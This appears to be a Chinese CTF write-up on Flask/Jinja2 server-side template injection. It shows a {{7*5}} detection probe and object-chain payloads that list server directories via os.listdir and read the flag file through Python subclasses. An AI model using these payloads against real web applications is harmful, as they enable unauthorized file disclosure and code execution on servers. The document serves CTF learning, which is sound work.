Web_python_template_injection攻防世界ctf web
2020-03-06 12:48
1101 查看
Web_python_template_injection
flask是使用Jinja2来作为渲染引擎的。看例子
在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。
看到template injection可以猜到是SSTI(Server-Side Template Injection) 服务端模板注入
{{}}在Jinja2中作为变量包裹标识符,所以在{{}}里面的内容会被当做变量,并并执行。
1.检验是否为SSTI
http://111.198.29.45:44517/{{7*5}} //无论什么乘什么都可以
执行了{{}}里面的内容,即存在SSTI
2.读取文件
1)
http://111.198.29.45:44517/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
因为是做题,确认了是SSTI,执行以上命令,查看一级目录 ’ . ’ ,得到
2)读取fl4g文件
http://111.198.29.45:44517/%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D
得到flag
参考两篇bPython——flask漏洞探究的blog
https://www.cnblogs.com/Rasang/p/12181654.html
https://www.freebuf.com/column/187845.html
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- 【CTF】攻防世界——mfw(web)
- 攻防世界-web-ctf 1
- 【攻防世界】CTF web新手07 关于web中的编码问题
- web萌新ctf练习--攻防世界--mfw
- CTF攻防世界 WEB方向 新手练习区 题解
- 【攻防世界】CTF web04-06 一些简单的题目
- 【攻防世界】CTF web新手03 robots协议
- 【攻防世界】CTF web新手09 弱口令爆破 weak_auth
- CTF -攻防世界-web新手区
- 攻防世界-web writeup(xctf)
- 攻防世界web新手之cookie
- 攻防世界web初级题
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- XCTF攻防世界web进阶练习_ 3_unserialize3
- 攻防世界web新手之simple_js
- 攻防世界 web题目 get_post
- 攻防世界 web进阶 NewsCenter
- [wp] 攻防世界 Web_php_unserialize
- 攻防世界web新手之buckup
- xctf攻防世界web新手练习区--write up